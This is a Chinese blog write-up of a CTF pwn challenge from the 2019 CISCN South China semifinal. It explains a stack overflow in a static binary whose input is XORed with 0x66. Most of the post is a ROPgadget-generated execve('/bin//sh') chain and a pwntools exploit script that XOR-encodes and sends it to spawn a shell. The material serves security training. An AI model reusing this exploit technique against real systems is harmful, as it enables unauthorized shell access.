2019-CISCN华南赛区半决赛 pwn8

原創 言承Yolanda 2020-02-23 16:12

参考博客:https://xz.aliyun.com/t/5517#toc-3

学长给了这道题目,结合了逆向+pwn

题目链接:链接:https://pan.baidu.com/s/1viEaLM-5pqmRoEzagi0Nmg   提取码:wwzb

64位的程序,是静态链接的,静态!可以直接构造rop链了

 

就开启了nx保护

 

执行的时候发现权限不够,直接给他加权限就可以,chmod +x easy_pwn

执行

 

emm,要把文件拖入桌面然后放入ida里面,因为桌面是C盘,有管理员执行权限

ida里面执行

函数很多,没有发现main函数,查找(alt+T)一下执行时候的字符串

找到函数,进入

 

进入sub_449BE0,分析得,应该就是read函数

且读入的字符数组接着又传入了sub_400C40函数

 

进入sub_400C40,a1也就是我们读入的数据

 

了解到了上面的点后,可以进行栈溢出操作

首先构造rop链ROPgadget --binary helloworld --ropchain

生成

	#!/usr/bin/env python2
	# execve generated by ROPgadget

	from struct import pack

	# Padding goes here
	p = ''

	p += pack('<Q', 0x00000000004040fe) # pop rsi ; ret
	p += pack('<Q', 0x00000000006ba0e0) # @ .data
	p += pack('<Q', 0x0000000000449b9c) # pop rax ; ret
	p += '/bin//sh'
	p += pack('<Q', 0x000000000047f7b1) # mov qword ptr [rsi], rax ; ret
	p += pack('<Q', 0x00000000004040fe) # pop rsi ; ret
	p += pack('<Q', 0x00000000006ba0e8) # @ .data + 8
	p += pack('<Q', 0x0000000000444f00) # xor rax, rax ; ret
	p += pack('<Q', 0x000000000047f7b1) # mov qword ptr [rsi], rax ; ret
	p += pack('<Q', 0x00000000004006e6) # pop rdi ; ret
	p += pack('<Q', 0x00000000006ba0e0) # @ .data
	p += pack('<Q', 0x00000000004040fe) # pop rsi ; ret
	p += pack('<Q', 0x00000000006ba0e8) # @ .data + 8
	p += pack('<Q', 0x0000000000449bf5) # pop rdx ; ret
	p += pack('<Q', 0x00000000006ba0e8) # @ .data + 8
	p += pack('<Q', 0x0000000000444f00) # xor rax, rax ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000047b94f) # syscall

 

接着可以构造exp

	#!/usr/bin/env python2
	# execve generated by ROPgadget

        from pwn import *
        io = process('./easy_pwn')
        context.log_level = 'debug'

	from struct import pack

	# Padding goes here
	p = ''

	p += pack('<Q', 0x00000000004040fe) # pop rsi ; ret
	p += pack('<Q', 0x00000000006ba0e0) # @ .data
	p += pack('<Q', 0x0000000000449b9c) # pop rax ; ret
	p += '/bin//sh'
	p += pack('<Q', 0x000000000047f7b1) # mov qword ptr [rsi], rax ; ret
	p += pack('<Q', 0x00000000004040fe) # pop rsi ; ret
	p += pack('<Q', 0x00000000006ba0e8) # @ .data + 8
	p += pack('<Q', 0x0000000000444f00) # xor rax, rax ; ret
	p += pack('<Q', 0x000000000047f7b1) # mov qword ptr [rsi], rax ; ret
	p += pack('<Q', 0x00000000004006e6) # pop rdi ; ret
	p += pack('<Q', 0x00000000006ba0e0) # @ .data
	p += pack('<Q', 0x00000000004040fe) # pop rsi ; ret
	p += pack('<Q', 0x00000000006ba0e8) # @ .data + 8
	p += pack('<Q', 0x0000000000449bf5) # pop rdx ; ret
	p += pack('<Q', 0x00000000006ba0e8) # @ .data + 8
	p += pack('<Q', 0x0000000000444f00) # xor rax, rax ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000047b94f) # syscall

        string = ''
        for i in p:
            string += chr(ord(i)^0x66)
        
        payload = 'a'*0x50 + string

        io.recvuntil("Please enter your Password: ")
        io.sendline(payload)

        io.interactive()

chr() 用一个范围在 range(256)内的(就是0~255)整数作参数,返回一个对应的字符

ord() 函数是 chr() 函数(对于8位的ASCII字符串)或 unichr() 函数(对于Unicode对象)的配对函数,它以一个字符(长度为1的字符串)作为参数,返回对应的 ASCII 数值,或者 Unicode 数值,如果所给的 Unicode 字符超出了你的 Python 定义范围,则会引发一个 TypeError 的异常。

 

【查找返回地址覆盖量(方法二)】

(1)创建覆盖的字符串:

root@kali:~/Documents# cyclic 100
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa

(2)进入gdb,run开始,将字符串放入输入点

(3)程序崩了,查看使程序崩的值(保存在esp里)

(4)进行异或操作

因为原来的程序对输入的每个字符串进行了异或操作,两次异或操作可以得到原来的值

 

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

linux pwn练习0x01

文章目錄doubly_dangerousWarmUp關於確定溢出點的一種方法:gdb-peda關於利用ret調用shellcode函數調用方式的基本介紹pwn1just_do_it 題目 doubly_dangerous 內

yusakul 2020-07-07 13:34:36

HITCON-Training lab5(自己构造rop)

看到靜態鏈接,一頓欣喜,直接ropchain生成,棧溢出找出來就ok啦?然後後來發現並沒有那麼簡單。。。 =================================================================

言承Yolanda 2020-07-08 01:37:40

HITCON-Training lab7(一道简单的格式化字符串读漏洞)

格式化字符串知道他的操作,可是做的一點也不熟練吧,,,BJDCTF上的r2t4不會啊,,,看不懂,,,所以就來補補格式化字符串的題目了,,,,   看到canary開啓了,我還以爲要泄漏canary呢,結果發現不用那麼麻煩,,, 其實

言承Yolanda 2020-07-08 01:37:40

HITCON-Training lab8(格式化字符串写漏洞)

還在補格式化字符串漏洞的知識,,,,看到這道題的時候,有點懵,,,因爲發現218不會整,,,看官方writeup也不太行,,,   先知社區上有篇講的就很好了,,,nice,用了四種方法(最後一種沒看懂,,,),,,看完,BJDCTF那道

言承Yolanda 2020-07-08 01:37:40

BJDCTF 2nd - Pwn(r2t3、one_gadget、r2t4)

r2t3 最簡單的一道題,可是我竟然沒有做出來,無語了,,, 文件保護沒啥好說的,,,很正常 進入name_check函數 255 ==> 255 256 ==> 0,257 ==> 1,258 ==> 2,259 ==> 3, 2

言承Yolanda 2020-07-08 01:37:40

栈迁移学习(buuctf [Black Watch 入群题])

i春秋的borrowstack是棧遷移和萬能gadget的混合,,,然後writeup看的不是很明白,也沒有很細的解析,所以,emmm,應該是自己棧遷移學的不是很好,只是知道大概的意思,但是還沒有做過題,這次在看雪看到文章,就好好學一下,

言承Yolanda 2020-07-08 01:37:40

BUUCTF刷题(前12道)

哈哈哈,我又來刷題了,看了下BUUCTF上面的pwn題還真多。。。 test_your_nc ida查看,發現直接執行system,所以,直接交互就可以 //寫下簡單的腳本 from pwn import * p = remote('

言承Yolanda 2020-07-08 01:37:40

逆向入门笔记之分析TraceMe.exe

TraceMe.exe是一個示例程序,用於逆向的學習,簡單地模擬了註冊機制。 我們把它拖進IDA中無腦F5一波: 雙擊DialogFunc進入這個函數: BOOL __stdcall DialogFunc(HWND hWnd, UIN

KogRow 2020-07-07 15:59:23

linux pwn练习0x02

文章目錄tyro_shellcode tyro_shellcode OpenCTF : tyro_shellcode Baby’s first shellcode problem. Server: 172.31.1.43:161

yusakul 2020-07-07 13:34:36

已知libc地址爆破TLS、ld.so等地址

已知libc地址爆破TLS、ld.so等地址 在大多數情況下,遠程的ld.so以及TLS等結構的地址與libc地址之間的偏移與本地的會不一樣,但是大致處於一個範圍內,並且,在同一個系統裏,這個差值是固定的,其差值的變化往往在偏移的第1.5

haivk 2020-07-05 02:32:56

ACTF_2019_ACTFNOTE(top chunk上移)

ACTF_2019_ACTFNOTE 首先,檢查一下程序的保護機制 然後,我們用IDA分析一下,edit裏存在溢出,可以直接修改top chunk的size 那麼只需要把top chunk的size修改爲-1,然後malloc(負數)

haivk 2020-07-05 02:32:56

iz_heap_lv1

iz_heap_lv1 首先,檢查一下程序的保護機制 然後,我們用IDA分析一下,delete功能裏存在數組下標越界,可以free掉第21個堆指針,而第21個位置對應name的空間 因此,我們可以在name裏僞造一個chunk,fr

haivk 2020-07-05 02:32:56

free_spirit(在栈上爆破一个可以被free的fake_chunk)

free_spirit(在棧上爆破一個可以被free的fake_chunk) 首先檢查一下程序的保護機制 然後,我們用IDA分析一下,功能3存在8字節溢出,將會把v7下面的buf指針覆蓋掉,而覆蓋了buf指針,就能實現任意地址寫。  

haivk 2020-07-05 02:32:56

DASCTF&BJDCTF 3rd 三道PWN题复现

最近看了一下上次安恆五月賽沒做出的幾道PWN題,感覺自己水平還是不夠,還要多學習 easybabystack(格式化字符串*, ret2csu) 這題有個棧溢出漏洞 但是必須輸入正確的密碼,否則就直接退出了 還有個格式化字符串

L.o.W 2020-07-04 09:32:10

Ubuntu_16.04 从0开始配置pwn环境

基礎軟件安裝 大佬@giantbranch 配置的虛擬機,如果覺得自己用搭建環境比較麻煩,可以在他的github中直接下載虛擬機(提取碼: kypa),個人感覺是非常適合新手入門時使用的一套工具,也可以從github上獲取腳本

阿鲁卡Alluka 2020-07-02 23:02:40